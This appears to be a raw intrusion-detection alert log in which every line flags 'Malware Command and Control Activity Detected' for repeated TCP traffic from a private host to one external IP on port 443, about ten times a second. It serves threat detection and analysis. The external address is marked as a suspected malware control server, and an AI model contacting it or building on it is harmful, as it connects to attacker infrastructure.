2025-06-02T21:41:26.815015+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:26.915036+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.016025+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.116030+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.216939+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.320916+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.418044+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.518810+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.619140+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.720306+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.823837+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:27.923861+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.023064+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.123413+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.224279+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.324058+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.424029+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.525110+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.626031+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.726039+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.827307+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:28.927066+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.028053+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.128043+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.228796+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.332926+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.429459+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.532896+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.631076+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.731111+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.832286+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:29.933042+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.035073+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.134086+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.236516+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.336845+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.436039+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.537122+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.637056+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.737069+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.838131+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:30.938065+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.039059+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.139054+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.240928+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.341057+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.441523+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.542104+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.643101+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.742055+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.843584+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:31.942062+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.043119+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.144054+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.245051+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.345076+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.445055+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.546056+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.648279+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.749288+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.850066+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:32.950303+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.050065+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.150066+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.251652+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.352075+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.453119+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.553067+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.653075+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.754075+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.855427+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:33.955684+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.056931+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.156293+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.257068+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.358073+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.458081+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.559075+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.659078+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.760231+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.861080+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:34.962080+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.062689+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.163427+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.263098+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.364927+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.465099+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.566196+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.666954+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.766098+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.867350+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:35.967484+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.068093+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.169244+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.269081+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.370088+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.472504+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.572279+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.673084+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.774128+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.875153+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:36.975123+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.076270+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.176110+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.276163+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.377577+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.480318+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.578117+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.678537+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.779091+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.880108+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:37.981123+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.082215+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.182380+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.283136+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.383531+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.484229+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.585341+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.685507+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.786196+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.886125+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:38.987148+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.088284+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.188099+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.289791+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.392306+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.489628+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.592985+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.690121+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.793098+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.892972+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:39.991143+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.092197+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.195011+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.293110+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.393303+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.493328+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.594156+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.695106+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.795295+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.896216+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:40.996235+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.098047+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.198152+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.298231+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.400950+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.498145+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.600978+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.699492+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.803177+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:41.900214+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.001450+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.103295+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.201143+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.302115+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.403166+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.503123+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.604273+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.704169+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.805194+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:42.906174+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.007129+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.107130+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.211110+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.308120+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.408283+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.511024+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.611137+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.709151+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.810958+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:43.912279+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.012539+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.111156+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.211373+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.312145+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.413338+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.513236+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.614140+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.714151+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.814172+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:44.915156+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.015179+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.115172+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.215486+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.316205+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.419651+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.516168+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.617149+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.717274+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.820962+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:45.918447+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.022884+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.121636+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.220276+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.321167+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.422201+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.523125+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.624281+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.724272+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.825151+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:46.926169+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.027194+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.128261+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.231666+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.329184+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.431036+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.530165+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.631246+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.731520+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.832278+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:47.935570+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.033177+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.133181+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.235069+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.335575+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.436152+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.537289+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.638751+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.738166+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.840281+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:48.940169+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.040156+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.141155+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.244974+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.342173+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.444274+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.544979+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.644998+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.746637+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
2025-06-02T21:41:49.845210+0200	2827745	1	Malware Command and Control Activity Detected	192.168.2.16	49773	94.158.245.140	443	TCP
